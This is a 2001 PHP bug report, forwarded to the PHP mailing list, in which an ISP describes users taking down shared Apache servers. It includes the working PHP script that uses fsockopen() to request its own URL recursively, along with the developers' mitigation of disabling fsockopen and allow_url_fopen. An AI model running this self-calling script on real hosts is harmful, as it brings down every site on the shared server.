ID: 14372
Updated by: rasmus
Reported By: [EMAIL PROTECTED]
Status: Bogus
Bug Type: Apache related
Operating System: FreeBSD 4.4-Stable
PHP Version: 4.0.6
New Comment:
Just to add to this. The way to fix it at the ISP level is to simply put
"disable_functions = fsockopen" in your php.ini file. Also make sure you turn off
"allow_url_fopen" since this feature can also be used to do something like this.
Previous Comments:
------------------------------------------------------------------------
[2001-12-07 03:18:28] [EMAIL PROTECTED]
You just can't fix this issue without prohibiting to call fsockopen().
Think yourself again, how can this be fixed? You can disallow http open_wrappers for
sure. The real fix is to remove the user.
There's no bug and nothing to fix -> Bogus.
------------------------------------------------------------------------
[2001-12-07 02:33:08] [EMAIL PROTECTED]
We have had users on our system using their PHP scripts to take down our Apache
servers. The script uses fsockopen() to call the page that issues the fsockopen()
function. When the script calls itself the sever gets into a loop of death, spawning
as many connections as httpd.conf will allow. Any incoming connections from then on
just hang and all the websites hosted on that machine are down. Here is and script
that uses this problem to attack Apache.
<?php
$fp = fsockopen ($HTTP_HOST, $SERVER_PORT, $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br>\n";
}
else
{
fputs ($fp, "GET $REQUEST_URI HTTP/1.0\r\nHost: $HTTP_HOST\r\n\r\n");
while (!feof($fp))
{
echo fgets ($fp,128);
}
fclose ($fp);
}
?>
Please fix this. We really had a hard time finding the person responsible for doing
this. They had the script in their home "public_html" directory and the only clue we
had was that in the Apache logs it was always the last page accessed before the server
freaked out and spawned over 150 Apache processes.
Thanks,
pHil Cogbill
3iem.net
------------------------------------------------------------------------
Edit this bug report at http://bugs.php.net/?id=14372&edit=1
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
